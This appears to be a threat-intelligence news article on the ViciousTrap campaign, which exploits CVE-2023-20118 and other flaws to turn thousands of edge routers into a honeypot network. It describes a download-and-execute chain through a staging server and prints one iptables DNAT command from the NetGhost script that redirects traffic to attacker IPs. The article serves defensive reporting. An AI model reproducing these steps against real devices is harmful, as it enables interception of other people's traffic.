A sophisticated threat actor designated as ViciousTrap has successfully compromised over 5,500 edge devices across more than 50 brands, transforming them into a massive distributed honeypot network capable of intercepting and monitoring exploitation attempts worldwide.
This unprecedented campaign represents a significant evolution in cyberthreat tactics, where attackers leverage compromised infrastructure not merely for traditional malicious purposes, but to create surveillance systems that can capture zero-day exploits and monitor other threat actors’ activities.
The campaign primarily targets end-of-life devices including SOHO routers, SSL VPNs, DVRs, and BMC controllers from major manufacturers such as Cisco, D-Link, Linksys, ASUS, QNAP, and Araknis Networks.
.png
)
The threat actor exploits known vulnerabilities, particularly CVE-2023-20118 affecting Cisco SOHO routers, to gain initial access and deploy their malicious infrastructure.
Sekoia researchers identified this campaign through their honeypot observations, noting sustained daily exploitation attempts originating from a single IP address since March 2025.
The geographic distribution of compromised devices spans 84 countries, with Macao showing the highest concentration of infected systems, likely due to widespread use of vulnerable D-Link DIR-850L routers in that region.
.webp)
The attackers operate from Malaysian infrastructure under Autonomous System AS45839, utilizing servers provided by Shinjiru hosting company.
Analysis reveals the threat actor’s likely Chinese-speaking origin, evidenced by weak overlaps with GobRAT infrastructure and strategic targeting patterns that avoid compromising devices within China while focusing on assets in Taiwan and the United States.
This honeypot network enables ViciousTrap to position themselves as silent observers in the cyberthreat ecosystem, potentially collecting non-public or zero-day exploits deployed by other threat actors.
The sophisticated nature of this operation suggests intelligence gathering objectives rather than traditional cybercriminal motivations, representing a concerning trend where compromised devices serve dual purposes as both attack infrastructure and surveillance platforms.
Infection Mechanism and NetGhost Deployment
The infection chain employed by ViciousTrap demonstrates remarkable technical sophistication through a multi-stage process designed to minimize detection while maximizing persistence.
Initial access begins with exploitation of CVE-2023-20118 vulnerability, where attackers execute commands through the vulnerable config.exp endpoint to download and execute a bash script.
The attack unfolds through a carefully orchestrated sequence: first, the attacker uses ftpget to retrieve a script named ‘a’ from their staging server at 101.99.90.20, which subsequently downloads a customized busybox wget binary compiled for MIPS architecture and stores it in the compromised device’s /tmp directory.
This binary serves as a critical component for subsequent communication with command and control infrastructure.
.webp)
Following initial payload deployment, the vulnerability is exploited a second time to retrieve and execute the main payload using a unique UUID identifier for each infection attempt.
This UUID-based system allows the attackers to implement an allow-list mechanism, ensuring payloads are delivered only to confirmed compromised systems.
The secondary script, internally designated as NetGhost, implements the core functionality of the operation.
NetGhost performs several critical functions upon execution. The script immediately removes itself using an rm command to minimize forensic artifacts, then conducts port availability checks on ports 80, 8000, and 8080 to identify suitable redirection targets.
Once an available port is identified, the script configures iptables NAT rules to redirect all inbound traffic to attacker-controlled interception servers, specifically 111.90.148.151 and 111.90.148.112.
/sbin/iptables -t nat -I PREROUTING -p tcp -m tcp --dport $Dport -j DNAT --to-destination $arg4:$arg5The final phase involves registration with the command and control infrastructure through five HTTP requests containing the redirected port number and victim identifier, effectively notifying attackers of successful compromise and enabling them to begin monitoring intercepted traffic.
This mechanism transforms each compromised device into a transparent proxy, allowing ViciousTrap to observe and potentially manipulate communications flowing through these systems while maintaining the appearance of normal device operation.
Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free
